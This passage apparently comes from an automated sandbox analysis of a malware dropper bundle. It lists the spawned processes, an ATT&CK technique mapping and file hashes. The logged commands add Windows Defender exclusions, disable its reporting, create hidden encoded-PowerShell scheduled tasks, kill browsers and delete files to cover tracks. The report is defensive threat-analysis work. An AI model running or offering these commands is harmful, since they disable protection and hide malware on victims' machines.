6⤵
- Executes dropped EXE
PID:1132

C:\Users\Admin\AppData\Local\Temp\dengbing.exe
"C:\Users\Admin\AppData\Local\Temp\dengbing.exe"
5⤵
- Executes dropped EXE
PID:4804

C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe
"C:\Users\Admin\AppData\Local\Temp\SharkSoftSetup36667.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
PID:832

C:\Users\Admin\AppData\Local\Temp\3ea14c16-a9d9-4d2e-acbe-4576a31ed49d.exe
"C:\Users\Admin\AppData\Local\Temp\3ea14c16-a9d9-4d2e-acbe-4576a31ed49d.exe"
6⤵
- Executes dropped EXE
PID:2988

C:\Users\Admin\AppData\Local\Temp\po50.exe
"C:\Users\Admin\AppData\Local\Temp\po50.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4172

C:\Users\Admin\AppData\Local\Temp\zhangj.exe
"C:\Users\Admin\AppData\Local\Temp\zhangj.exe"
5⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:4384

C:\Users\Admin\AppData\Local\Temp\zhangj.exe
"C:\Users\Admin\AppData\Local\Temp\zhangj.exe" -h
6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4796

C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
5⤵
- Executes dropped EXE
PID:4632

C:\Users\Admin\AppData\Local\Temp\bcleaner.exe
"C:\Users\Admin\AppData\Local\Temp\bcleaner.exe"
5⤵
- Executes dropped EXE
PID:4272

C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe
"C:\Users\Admin\AppData\Local\Temp\jg7_7wjg.exe"
5⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4656

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
5⤵
- Executes dropped EXE
PID:4084

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
5⤵
- Executes dropped EXE
PID:5072

C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
5⤵
- Executes dropped EXE
PID:2688

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
5⤵
PID:3544

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:2600

C:\Windows\SysWOW64\schtasks.exe
schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
3⤵
- Creates scheduled task(s)
PID:3488

C:\Users\Admin\Pictures\Adobe Films\xWLRw6KAtqAoF3uYufezyU9I.exe
"C:\Users\Admin\Pictures\Adobe Films\xWLRw6KAtqAoF3uYufezyU9I.exe"
2⤵
- Executes dropped EXE
PID:4076

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1368
3⤵
- Program crash
PID:3316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 1400
3⤵
- Program crash
PID:2344

C:\Users\Admin\Pictures\Adobe Films\5KrMMzV4lYg34LPlN2TKrre2.exe
"C:\Users\Admin\Pictures\Adobe Films\5KrMMzV4lYg34LPlN2TKrre2.exe"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Maps connected drives based on registry
PID:1840

C:\Users\Admin\Pictures\Adobe Films\aSRMIbDkVo8osmoJWbe0dJbt.exe
"C:\Users\Admin\Pictures\Adobe Films\aSRMIbDkVo8osmoJWbe0dJbt.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
PID:1780

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im aSRMIbDkVo8osmoJWbe0dJbt.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\Adobe Films\aSRMIbDkVo8osmoJWbe0dJbt.exe" & del C:\ProgramData\*.dll & exit
3⤵
PID:4364

C:\Windows\SysWOW64\taskkill.exe
taskkill /im aSRMIbDkVo8osmoJWbe0dJbt.exe /f
4⤵
- Kills process with taskkill
PID:2608

C:\Windows\SysWOW64\timeout.exe
timeout /t 6
4⤵
- Delays execution with timeout.exe
PID:4308

C:\Users\Admin\Pictures\Adobe Films\zIjziXqTZtL6TVi_WXzxttya.exe
"C:\Users\Admin\Pictures\Adobe Films\zIjziXqTZtL6TVi_WXzxttya.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:2152

C:\Users\Admin\AppData\Local\Temp\d87a6c1e-4c53-41df-8762-ff0834c975b2.exe
"C:\Users\Admin\AppData\Local\Temp\d87a6c1e-4c53-41df-8762-ff0834c975b2.exe"
3⤵
- Executes dropped EXE
PID:4992

C:\Users\Admin\Pictures\Adobe Films\FSiutCi_C9g5l_U_qzWouquE.exe
"C:\Users\Admin\Pictures\Adobe Films\FSiutCi_C9g5l_U_qzWouquE.exe"
2⤵
- Executes dropped EXE
PID:3568

C:\Users\Admin\Pictures\Adobe Films\cdRFSbaD5wfOwUq5OD8Y_bgN.exe
"C:\Users\Admin\Pictures\Adobe Films\cdRFSbaD5wfOwUq5OD8Y_bgN.exe"
2⤵
- Executes dropped EXE
PID:2724

C:\Users\Admin\Pictures\Adobe Films\aTtFt7lCS6ZI8vNMzQ_AnQdm.exe
"C:\Users\Admin\Pictures\Adobe Films\aTtFt7lCS6ZI8vNMzQ_AnQdm.exe"
2⤵
- Executes dropped EXE
PID:756

C:\Users\Admin\Pictures\Adobe Films\FFXAiRNs4EldPaihY1sTKXkb.exe
"C:\Users\Admin\Pictures\Adobe Films\FFXAiRNs4EldPaihY1sTKXkb.exe"
2⤵
- Executes dropped EXE
PID:3392

C:\Users\Admin\Pictures\Adobe Films\R9vbL0ypLAopLUN_Ov5e85_v.exe
"C:\Users\Admin\Pictures\Adobe Films\R9vbL0ypLAopLUN_Ov5e85_v.exe"
2⤵
- Executes dropped EXE
PID:3236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 432
3⤵
- Program crash
PID:4224

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3236 -s 440
3⤵
- Program crash
PID:4112

C:\Users\Admin\Pictures\Adobe Films\tnskCXTQ3t_OPZ1RlasU8Rsb.exe
"C:\Users\Admin\Pictures\Adobe Films\tnskCXTQ3t_OPZ1RlasU8Rsb.exe"
2⤵
- Executes dropped EXE
- Modifies system certificate store
- Suspicious use of AdjustPrivilegeToken
PID:3920

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
3⤵
PID:4216

C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
4⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4360

C:\Users\Admin\Pictures\Adobe Films\_Oo_LwtjZ89hfSyHPy6yIhwe.exe
"C:\Users\Admin\Pictures\Adobe Films\_Oo_LwtjZ89hfSyHPy6yIhwe.exe"
2⤵
- Executes dropped EXE
PID:2656

C:\Users\Admin\Pictures\Adobe Films\nbSiITdIUKyZbJtbvZkILKqa.exe
"C:\Users\Admin\Pictures\Adobe Films\nbSiITdIUKyZbJtbvZkILKqa.exe"
2⤵
- Executes dropped EXE
PID:2948

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2948 -s 452
3⤵
- Program crash
PID:4312

C:\Users\Admin\Pictures\Adobe Films\o4jcM6LrerPSL5EwekSwbTN2.exe
"C:\Users\Admin\Pictures\Adobe Films\o4jcM6LrerPSL5EwekSwbTN2.exe"
2⤵
- Executes dropped EXE
PID:2720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2720 -s 452
3⤵
- Program crash
PID:4344

C:\Users\Admin\Pictures\Adobe Films\DDVvwjLb77LpKqM9KFJTxOqm.exe
"C:\Users\Admin\Pictures\Adobe Films\DDVvwjLb77LpKqM9KFJTxOqm.exe"
2⤵
- Executes dropped EXE
PID:2528

C:\Users\Admin\Pictures\Adobe Films\zwCiq6ExDDwgz0LzeWEbVyZn.exe
"C:\Users\Admin\Pictures\Adobe Films\zwCiq6ExDDwgz0LzeWEbVyZn.exe"
2⤵
- Executes dropped EXE
- Checks computer location settings
PID:2904

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
3⤵
PID:4396

C:\Windows\SysWOW64\cmd.exe
cmd
4⤵
PID:4524

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq BullGuardCore.exe"
5⤵
- Enumerates processes with tasklist
PID:4760

C:\Windows\SysWOW64\find.exe
find /I /N "bullguardcore.exe"
5⤵
PID:4016

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "imagename eq PSUAService.exe"
5⤵
- Enumerates processes with tasklist
PID:1196

C:\Windows\SysWOW64\find.exe
find /I /N "psuaservice.exe"
5⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:5092

C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^uEDzPzHFCdzewXWMRhXuwzGNjMXXrsYuMnTuDfFnaaWMxrxJAnNdPOrNYPircJBlshdCrQoBHnNIvTzoshbFDH$" Koubbeh.gif
5⤵
PID:3056

C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Accostarmi.exe.pif
Accostarmi.exe.pif N
5⤵
- Executes dropped EXE
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3164

C:\Users\Admin\Pictures\Adobe Films\DILH6y1J6d67_qFohQhl5yIk.exe
"C:\Users\Admin\Pictures\Adobe Films\DILH6y1J6d67_qFohQhl5yIk.exe"
2⤵
- Executes dropped EXE
PID:1856

C:\Users\Admin\Pictures\Adobe Films\j983aU7mLXKldwRB_TAPSL62.exe
"C:\Users\Admin\Pictures\Adobe Films\j983aU7mLXKldwRB_TAPSL62.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2248

C:\Users\Admin\AppData\Local\Temp\7zS281D.tmp\Install.exe
.\Install.exe
3⤵
- Executes dropped EXE
PID:1532

C:\Users\Admin\AppData\Local\Temp\7zS36D3.tmp\Install.exe
.\Install.exe /S /site_id "525403"
4⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks computer location settings
- Drops file in System32 directory
- Enumerates system info in registry
PID:4156

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
5⤵
PID:2176

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
6⤵
PID:5000

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
7⤵
PID:3264

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
7⤵
PID:3496

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
5⤵
PID:4860

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
6⤵
PID:336

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
7⤵
PID:4708

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
7⤵
PID:5068

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gMafhUCYD" /SC once /ST 12:55:26 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
5⤵
- Creates scheduled task(s)
PID:3012

C:\Windows\SysWOW64\schtasks.exe
schtasks /run /I /tn "gMafhUCYD"
5⤵
PID:2320

C:\Windows\SysWOW64\schtasks.exe
schtasks /DELETE /F /TN "gMafhUCYD"
5⤵
PID:5084

C:\Users\Admin\Pictures\Adobe Films\J7TLo1ZDOHiBpIRDeZAWJWfZ.exe
"C:\Users\Admin\Pictures\Adobe Films\J7TLo1ZDOHiBpIRDeZAWJWfZ.exe"
2⤵
- Executes dropped EXE
- Checks processor information in registry
PID:1412

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\syswow64\rundll32.exe" "C:\Windows\syswow64\shell32.dll",#61
3⤵
- Blocklisted process makes network request
PID:1928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k wusvcs -p
1⤵
PID:1132

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 2656 -ip 2656
1⤵
PID:3800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 636 -p 2720 -ip 2720
1⤵
PID:2592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 3236 -ip 3236
1⤵
PID:1112

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 756 -ip 756
1⤵
PID:4044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 2724 -ip 2724
1⤵
PID:3296

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4076 -ip 4076
1⤵
PID:2848

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 2948 -ip 2948
1⤵
PID:2052

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 628 -p 3392 -ip 3392
1⤵
PID:3252

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1412 -ip 1412
1⤵
PID:3716

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 3236 -ip 3236
1⤵
PID:4608

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 600 -p 756 -ip 756
1⤵
PID:4620

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 664 -p 2720 -ip 2720
1⤵
PID:4640

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 680 -p 4076 -ip 4076
1⤵
PID:4656

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 720 -p 2656 -ip 2656
1⤵
PID:4676

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 748 -p 2948 -ip 2948
1⤵
PID:4688

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 776 -p 2724 -ip 2724
1⤵
PID:4732

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 804 -p 3392 -ip 3392
1⤵
PID:4748

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4076 -ip 4076
1⤵
PID:4860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4076 -ip 4076
1⤵
PID:4884

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 4076 -ip 4076
1⤵
PID:5044

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 4076 -ip 4076
1⤵
PID:5104

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 812 -p 4076 -ip 4076
1⤵
PID:3496

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4984 -ip 4984
1⤵
PID:4032

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 756 -p 4984 -ip 4984
1⤵
PID:3736

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3224 -ip 3224
1⤵
PID:4576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 4984 -ip 4984
1⤵
PID:2440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 4984 -ip 4984
1⤵
PID:3296

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:4712

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 1412 -ip 1412
1⤵
PID:4568

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3224 -ip 3224
1⤵
PID:4624

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 1412 -ip 1412
1⤵
PID:4036

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 3224 -ip 3224
1⤵
PID:1696

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 4804 -ip 4804
1⤵
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 692 -p 1412 -ip 1412
1⤵
PID:488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 708 -p 3224 -ip 3224
1⤵
PID:4260

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 500 -p 3224 -ip 3224
1⤵
PID:4412

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 704 -p 1412 -ip 1412
1⤵
PID:2992

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 412 -p 4076 -ip 4076
1⤵
PID:3348

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
PID:3080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 728 -p 1412 -ip 1412
1⤵
PID:2436

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 3224 -ip 3224
1⤵
PID:3556

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 1412 -ip 1412
1⤵
PID:4468

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3224 -ip 3224
1⤵
PID:4364

Network

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Scheduled Task

T1053

Persistence

Modify Existing Service

T1031

Registry Run Keys / Startup Folder

T1060

Scheduled Task

T1053

Privilege Escalation

Scheduled Task

T1053

Defense Evasion

Modify Registry

T1112

Disabling Security Tools

T1089

Virtualization/Sandbox Evasion

T1497

Install Root Certificate

T1130

Credential Access

Credentials in Files

T1081

Discovery

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

System Information Discovery

T1082

Peripheral Device Discovery

T1120

Process Discovery

T1057

Lateral Movement

Collection

Data from Local System

T1005

Exfiltration

Command and Control

Web Service

T1102

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\mozglue.dll
MD5
8f73c08a9660691143661bf7332c3c27

SHA1
37fa65dd737c50fda710fdbde89e51374d0c204a

SHA256
3fe6b1c54b8cf28f571e0c5d6636b4069a8ab00b4f11dd842cfec00691d0c9cd

SHA512
0042ecf9b3571bb5eba2de893e8b2371df18f7c5a589f52ee66e4bfbaa15a5b8b7cc6a155792aaa8988528c27196896d5e82e1751c998bacea0d92395f66ad89

Download Submit
C:\ProgramData\nss3.dll
MD5
bfac4e3c5908856ba17d41edcd455a51

SHA1
8eec7e888767aa9e4cca8ff246eb2aacb9170428

SHA256
e2935b5b28550d47dc971f456d6961f20d1633b4892998750140e0eaa9ae9d78

SHA512
2565bab776c4d732ffb1f9b415992a4c65b81bcd644a9a1df1333a269e322925fc1df4f76913463296efd7c88ef194c3056de2f1ca1357d7b5fe5ff0da877a66

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
MD5
54e9306f95f32e50ccd58af19753d929

SHA1
eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

SHA256
45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

SHA512
8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
a47b04d44a32f9c8f0219c8be7e3c881

SHA1
a7ab41e8825643673e98cf814bdc6cd88ade402b

SHA256
75d0beae03e9f4aa26236df186c3cc298f923b93c3e9b8b7bdb0d4376529b680

SHA512
b5dc23f573dcfac98f712b4f4beef83f57c307d221e0c3e56b6ed14130bb2eddfbce193bb0618424cbd34a5122053d6630e556b52af5b341d56565d09c427cd5

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
MD5
39ca4707f3b48dd241944f929346e193

SHA1
0178f8b5249867f6ac1b4c0ca901a6500d401617

SHA256
ad2891d33e6b967c8b8f10bd1dfdf79ba53b041b29ab92b0f9c30d2e7c8fe800

SHA512
35176f0898339713575aa44374c90e83b1eb98e23733a760981c13be352aa4136cf3829d38b9d8bc7889b7cc4dd4cd19c75e6b949a8aba9484ae6ae2119cb79c

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27
MD5
83827997ec75d63a77ffa1ce5f762c59

SHA1
88d86c0e89d10c973dd2de62f78db2585a20054d

SHA256
6fe85c04a1f80df2fe9d1fa900aa2bee6194c9a56e4aaab811554929d453d49d

SHA512
acd0b3d3fdab0b7f9bb067015d5bead774207b1e3e9902a25d9450ca30007bfe9a10edb554e53fbae1a27bc064fd194c4db1d1d9e5929ce17c9f6249db8ade59

Download Submit
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Affaticato.gif
MD5
a91c6de38b0f9ea9f613b62e78855165

SHA1
e8bb7269deb415fcbc0b417283f8bc89a6131e16

SHA256
46bc29a03060b1e64ff4c937ac7a9f404236a7b9a00aafea8d9e5574b1bc2896

SHA512
38a2e1d3d52fab38db79aef07f1e7e0c7bd3862e0bfe9fe934ee82aea9ff53bc1667760dcbd7ed8ad7c03cbbaa7c8a308455cd0eb6c449cf943344ecc6e3a583

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS281D.tmp\Install.exe
MD5
af09be06979117eb025e62bd0e1ab55a

SHA1
36ac1ee05fb291f077af9b24f35788b9506e3694

SHA256
7e7778f88c4879eb20fd1a2e445ad38dee840e9d6f2e5bf04596b609179c1383

SHA512
fd161ffd5388debc8a10a9f70176897c2533af6622583f8887819f73c856d26bc8a3a31a43ce1cde7ae46e5c2416708efcf3b95ed129525867d66c6932cce0b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS281D.tmp\Install.exe
MD5
af09be06979117eb025e62bd0e1ab55a

SHA1
36ac1ee05fb291f077af9b24f35788b9506e3694

SHA256
7e7778f88c4879eb20fd1a2e445ad38dee840e9d6f2e5bf04596b609179c1383

SHA512
fd161ffd5388debc8a10a9f70176897c2533af6622583f8887819f73c856d26bc8a3a31a43ce1cde7ae46e5c2416708efcf3b95ed129525867d66c6932cce0b5

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS36D3.tmp\Install.exe
MD5
55686434ed5d9edcda8e5b437aa93bfc

SHA1
708661ba30ee806c6e14695127283d49b227cb6a

SHA256
0c41e45a7b895290ab3319cf4eb18e9556b4f1fd3c2bc9bea984ce88f2b4a933

SHA512
85a71510c9254bec1cdd0a85534cb208dd8fb1b8f909410542019e3f613d875c2db36906b06ec0ed9a3940c219b8868b366499cec80b535c7bdbfacc85a2c9c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\7zS36D3.tmp\Install.exe
MD5
55686434ed5d9edcda8e5b437aa93bfc

SHA1
708661ba30ee806c6e14695127283d49b227cb6a

SHA256
0c41e45a7b895290ab3319cf4eb18e9556b4f1fd3c2bc9bea984ce88f2b4a933

SHA512
85a71510c9254bec1cdd0a85534cb208dd8fb1b8f909410542019e3f613d875c2db36906b06ec0ed9a3940c219b8868b366499cec80b535c7bdbfacc85a2c9c1

Download Submit
C:\Users\Admin\AppData\Local\Temp\pidHTSIGEi8DrAmaYu9K8ghN89.dll
MD5
f07ac9ecb112c1dd62ac600b76426bd3

SHA1
8ee61d9296b28f20ad8e2dca8332ee60735f3398

SHA256
28859fa0e72a262e2479b3023e17ee46e914001d7f97c0673280a1473b07a8c0

SHA512
777139fd57082b928438b42f070b3d5e22c341657c5450158809f5a1e3db4abded2b566d0333457a6df012a4bbe3296b31f1caa05ff6f8bd48bfd705b0d30524

Download Submit
C:\Users\Admin\Documents\dMKKX4fKZX2_x4WEKOrxzGZG.exe
MD5
68658cac51a3ee725891799aac339613

SHA1
8a00543b1af0d4ab8f130bc66d2a4a0b2d33cb0f

SHA256
e96bffaf47466cbe75dcf428e6644292c49af8db919bfbcf6d5797cb0eeef35d

SHA512
231a5517b22101dfd33295f294cedf32626a8586d1fa762cae783d779e551a3dfe5a6f972184ebcc1a832783b4fd51ce57965aee50d089a9c6e6e1256e2a9a63

Download Submit
C:\Users\Admin\Documents\dMKKX4fKZX2_x4WEKOrxzGZG.exe
MD5
68658cac51a3ee725891799aac339613

SHA1
8a00543b1af0d4ab8f130bc66d2a4a0b2d33cb0f

SHA256
e96bffaf47466cbe75dcf428e6644292c49af8db919bfbcf6d5797cb0eeef35d

SHA512
231a5517b22101dfd33295f294cedf32626a8586d1fa762cae783d779e551a3dfe5a6f972184ebcc1a832783b4fd51ce57965aee50d089a9c6e6e1256e2a9a63

Download Submit
C:\Users\Admin\Pictures\Adobe Films\5KrMMzV4lYg34LPlN2TKrre2.exe
MD5
dbf517f72a9022a65ad455fa71a108e0

SHA1
fac7c92a86cfb1a3dc1e2bcdf4fdf2164f1daedb

SHA256
a622231d8484511217750235fb454d1f947058d098aa7211eccd235a965056d0

SHA512
